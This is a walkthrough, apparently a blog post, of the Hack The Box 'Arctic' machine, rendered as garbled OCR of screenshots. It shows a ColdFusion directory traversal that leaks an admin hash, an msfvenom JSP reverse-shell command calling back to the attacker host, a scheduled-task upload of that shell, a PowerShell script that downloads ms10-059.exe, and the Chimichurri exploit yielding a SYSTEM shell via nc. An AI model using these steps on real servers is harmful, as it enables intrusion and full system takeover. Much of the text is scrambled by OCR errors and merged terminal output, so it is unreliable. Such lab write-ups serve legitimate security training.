HTB – Arctic Walkthrough

nmap

Nmap scan report for 10.10. 10.11 Host is up (0.14s latency). Not shown: 997 filtered ports PORT 135/tcp STATE SERVICE VERSION open msrpc Microsoft Windows RPC 8500/tcp open fmtp? 49154/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Port 8500 – ColdFusion

Index of/ @ 10.10.10.11:8500 Most Visited O Getting Started OSCP a Pivot a PrivEsc ClientSide Index of / CFIDE/ cfdocs/ dir dir 03/22/17 08:52 03/22/17 08:55

ColdFusion File Inclusion

https://www.exploit-db.com/exploits/14641

ColdFusionAdministratc x #Wed X G) 4 10.10.10.11 Adobe ColdFusion - Dire X Q Search Most Visited O Getting Started EOSCP a Pivot a PrivEsc a ClientSide t Meterpreter a Web a DB exam *Wed Mar 22 EET 2017 password=2F635F6D20E3FDEOC53075AUB68FB07DCEC9B03 enc ted=true admin *Wed Mar 22 EET 2017 password=2F635F6D20E3FDEOC53075AUB68FB07DCEC9B03 enc ted=true #Wed rdspass passwor encryptf Mar 22 EET 2017 aomoceceace

Hash Crack

Possible Hashs: 冖 + 一 mySQL5 冖 SHA-I HASH: 2F635F6D20E3FDEOC53075A84868F807DCEC9803 SHA-1(SHA-1($pass)) 一 37r00t6ka11 一 丶 home 丶 kal sa 丶 TB 丶 arc hash-identifier / 丶 Root@81ackp10it.com www.81ackp101t.com By Zlon3R 丶 VI . 1
@ https://hashkiller.co.uk/Cracker Most Visited o Getting Started a OSCP a Pivot a PrivEsc a ClientSide a Meterpreter E Web HashKiller Hash Cracker List Manager Cracker Result We cracked 1 hashes leaving 0 left. Crack my Hashes Upload button disabled? We use Google reCAPTGHA v3. Cracker Results: SHAI happyday

JSP Shell Creation & File Upload & Shell

msfvenom -p java/jsp shell reverse tcp LHOST=10.10.14.10 LPORT=8888 -f raw > shell.jsp 'ayload size: 1497 bytes
5 G) 4 10.10.10.11 :8500/CFlDE/administrator/index.cfm Q Search Most Visited O Getting Started EOSCP a Pivot a PrivEsc a ClientSide a Meterpreter a Web a DB CF ADOBE* COLDFUSION' ADMINISTRATOR exam Ill \ •e i Q LOGOUT Expand All X Collapse All SERVER SETTINGS Settings Request Tuning Caching Client Variables MemoiY Variables Mappings Mail Chalting Font Management Java and JVM Settings SummalY DATA & SERVICES Data Sources Verity Collections Verity K2 Sewer Web Sewices Flex Integration DEBUGGING & LOGGING Debug Output Settings Debugging IP Addresses Debugger Settings Logging Settings Log Files Scheduled Tasks System Probes Code Analyzer License Scanner SERVER MONITORING EXTENSIONS EVENT GATE-NYS SECURITY Debugging & Logging > Add/Edit Scheduled Task Add/Edit Scheduled Task Task Name Duration Frequency URL User Name Password Timeout (sec) Proxy Server Publish File shell Start Date 21 2019 O O Recurring Daily every Daily Hours Stan Time v End Date (optional) at Minutes Seconds End Time http://10.10.14.10:8000/shell.jsp : Port Save output to a file ion8\wwwroot\CFlDE\shell.jsp Resolve URL Resolve Internal URLs so that links reman Intact Submit Cancel

Run the task and open the file on the following directory

C:\ColdFusion8\wwwroot\CFIDE\shell.jsp

Debugging & Logging > Scheduled Tasks Scheduled tasks can create static web pages from dynamic data sources. You can also schedule tasks to update Verity searches and to create repolts Schedule New Task Scheduled Tasks Actions Task Name @ o a @ shell Duration 21 Mai 2019 Interval One-time at 1:45
nc -nlvp 8888 listening on [any] 8888 connect to [10.10. 14.10] from (UNKNOWN} [10.10.10.11] Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights ColdFusionAdministratc X 10.10.10.11:8500/CFlDE/sm X @ 10.10.10.11:8500/CFlDE/shell.jsp 49419 reserved. root@kali: home/kalisa/H Mozilla Firefox •e Q search Most Visited O Getting Started EOSCP a Pivot a PrivEsc a ClientSide EMeterpreter a Web a DB texam

Privilege escalation

systeminfo Host Name: OS Name: OS Version: OS manufacturer: OS Configuration: OS Build Type: Registered Owner: Registered Organization: Product ID: Original Install Date: System Boot Time: System manufacturer: System model: System Type: Processor(s): BIOS Version: Windows Directory: System Directory: Boot Device: System Locale: Input Locale: Time Zone: Total Physical memory: Available Physical memory: Virtual memory: max Size: Virtual memory: Available: Virtual memory: In Use: Page File Location(s): Domain: Logon Server: Hotfix(s): Network Card(s): ARCTIC Microsoft Windows Server 2008 R2 Standard 6.1.7600 N/A Build 7600 Microsoft Corporation Standalone Server multiprocessor Free Windows User 55041-507-9857321-84451 22/3/2017, 21/5/2019, VPlware, Inc. VPlware Virtual Platform x64-based PC 2 Processor(s) Installed. [01]: Inte164 Family 6 model 63 Stepping 2 Genuinelntel [02]: Inte164 Family 6 model 63 Stepping 2 Genuinelntel -2594 Mhz -2594 Mhz Phoenix Technologies LTD 6.00, C : \Windows el; Greek en-us;English (United States) (UT CA-02:00) Athens, Bucharest, 5/4/2016 Istanbul 1.024 ma 208 ma 2.048 ma 1.156 ma 892 C: \pagefile.sys N/A N/A 1 NIC(s) Installed. [01]: Intel (R) PRO/IOOO PIT Network Connection

Python exploit suggester

python [ initiating winsploit version 3.3... [+1 writing to file 2019-05-19-mssb.xls [ done PIS11-011: ms10-073: ms10-061: ms10-059: ms10-047: ms10-002: PIS09-072: . /windows-exploit-suggester.py - -update -systeminfo systeminfo python windows-exploit-suggester.py initiating winsploit version 3.3... database file detected as xls or xlsx based on extension attempting to read from the systeminfo input file systeminfo input file read successfully (utf-8) querying database file for potential vulnerabilities -database 2019-05-19-mssb.xls [+1 [+1 [+1 comparing the O hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits there are now 197 remaining vulns [E] exploitdb POC, [PI] metasploit module, [ * ] missing bulletin windows version identified as 'Windows 2008 R2 64-bit' PIS13-009: Cumulative Security Update for Internet Explorer (2792100) Critical PIS13-005: Vulnerability in Windows Kernel-mode Driver Could Allow Elevation of Privilege (2778930) Important PIS12-037: Cumulative Security Update for Internet Explorer (2699988) Critical http //www. exploit-db . com/exploits/35273/ Internet Explorer 8 Fixed col span ID Full ASLR, DEP & EMET 5. , POC http //www. exploit-db . com/exploits/34815/ Internet Explorer 8 Fixed col span ID Full ASLR, DEP & EMET 5.0 Bypass (ms12-037), Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) Important Vulnerabilities in Windows Kernel-mode Drivers Could Allow Elevation of Privilege (981957) Important Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) Critical Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) Important Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) Important Cumulative Security Update for Internet Explorer (978207) Critical Cumulative Security Update for Internet Explorer (976325) Critical done POC

Upload ms10-059.exe (Chimchurri) via Powershell

Applications Places Terminator Sun 10:50 root@kali: /home/kalisa/HTB/arctic root@kali: /mnt/hgfs/Kali-Shared root@kali: /home/kalisa/HTB/arctic root@kali: /home/kalisa/HTB/arctic e root@kali: /home/kalisa/HTB/arctic root@kali: /home/kalisa/HTB 158x34 18/03/2008 22/03/2017 18/03/2008 18/03/2008 12:11 09:53 12:11 12:11 17 File(s) 64.512 wsconfig.exe 1.013 wsconfig_jvm.config 64.512 wsd12java.exe 64.512 xmlscript.exe 3.339.263 bytes 2 Dir(s) 33.180. 127.232 bytes free $storageDir $pwd > wget.psl echo $storageDir $pwd > wget.psl $webclient New-Object System.Net.WebClient >>wget.psl echo $webclient New-Object System.Net.WebClient $url "http://10. echo $url //10. 10 . 14 . 10 8000/ms10-059. exe" $file •vms10-059. echo $file "PlSIO-059.exe" >>wget.psl . PSI 10.14.10:8000/ms10-059.exe" . PSI PSI >>wget.psl echo >>wget.psl -ExecutionPolicy Bypass -NoLogo power shell. exe -ExecutionPolicy Bypass -NoLogo -Nonlnteractive -NoProfile -Nonlnteractive -File wget.psl -NoProfile -File wget.psl dir Volume in drive C has no label. Volume Serial Number is F88F-4EA5 Directory of 21/05/2019 01:52 root@kali: /home/kalisa/HTB/arctic 158x8 Is coldfusion-login coldfusion.py hash msf . exe nmap.gnmap nmap.nmap nmap.xml power shell shell.jsp root@kati : /home/kaIisa/HTB/arctic# serving HTTP on O.O.O.O port 8000 python -m SimpleHTTPServer 10.10. 10.11 10.10. 10.11 10.10. 10.11 [19/may/2019 [19/may/2019 10:40. •48] [19/may/2019 "GET /shell.jsp HTTP/I.I" 200 "GET /shell.jsp HTTP/I.I" 200 "GET /ms10-059.exe HTTP/I.I" 200

Get an admin shell with exe file

19/01/2008 18/03/2008 64.512 18/03/2008 71.680 18/03/2008 18/03/2008 64.512 22/03/2017 18/03/2008 64.512 21/05/2019 784.384 18/03/2008 34.816 18/03/2008 64.512 21/05/2019 21/05/2019 18/03/2008 78.848 18/03/2008 64.512 22/03/2017 18/03/2008 64.512 18/03/2008 64.512 10. 12. .11 12. 12. .11 12. 09. .53 12. 02. .04 12. 12. .11 02. 01. .50 12. 12. .11 09. 12. .11 12. 18 File(s) 2. 629.632 5.120 1.804 179 112 1.013 j ikes.exe j run. exe j runsvc. exe j runsvcmsg.dll jspc.exe jvm.config migrate exe ms10-059.exe portscan.dll sniffer . exe wget.psl wget . pslpowershell. exe WindowsLogin . dll wsconfig. exe wsconfig_j vm . config wsd12j ava . exe xmlscript. exe 2 Dir(s) 33.182. C : 10 ms10-059.exe 10.10.14.10 6666 / Chimichurri/-->This exploit gives you a Local System shell <8R>/Chimichurri/-->Changing registry values.. .<8R>/Chimichurri/-->Got SYSTEM token.. .<8R>/Chimichurri/-->Running reverse shell.. / Chimichurri/-->Restoring default registry values.. root@kali: /home/kalisa/HTB/arctic 96x15 nc -nlvp 6666 listening on [any] 6666 connect to [10.10. 14.10] from (UNKNOWN) [10.10. 10.11] 49535 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. whoami nt authority\system 4. 123.684 bytes 519.296 bytes free -059. exe 10.10. 14.10 6666

.

Leave a comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.